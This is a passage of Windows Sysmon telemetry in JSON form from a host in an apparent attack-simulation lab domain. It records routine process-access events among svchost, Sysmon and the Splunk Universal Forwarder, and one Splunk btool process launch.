C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.954\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010E96E0500}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.954","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010E96E0500}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.188\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010E96E0500}\r\nSourceProcessId: 3892\r\nSourceThreadId: 3896\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.188","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010E96E0500}","SourceProcessId":"3892","SourceThreadId":"3896","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010E96E0500}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010E96E0500}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.230\r\nProcessGuid: {41C8662E-1FF5-5F25-0000-0010A2710500}\r\nProcessId: 2008\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.230","ProcessGuid":"{41C8662E-1FF5-5F25-0000-0010A2710500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010A2710500}\r\nTargetProcessId: 2008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010A2710500}","TargetProcessId":"2008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
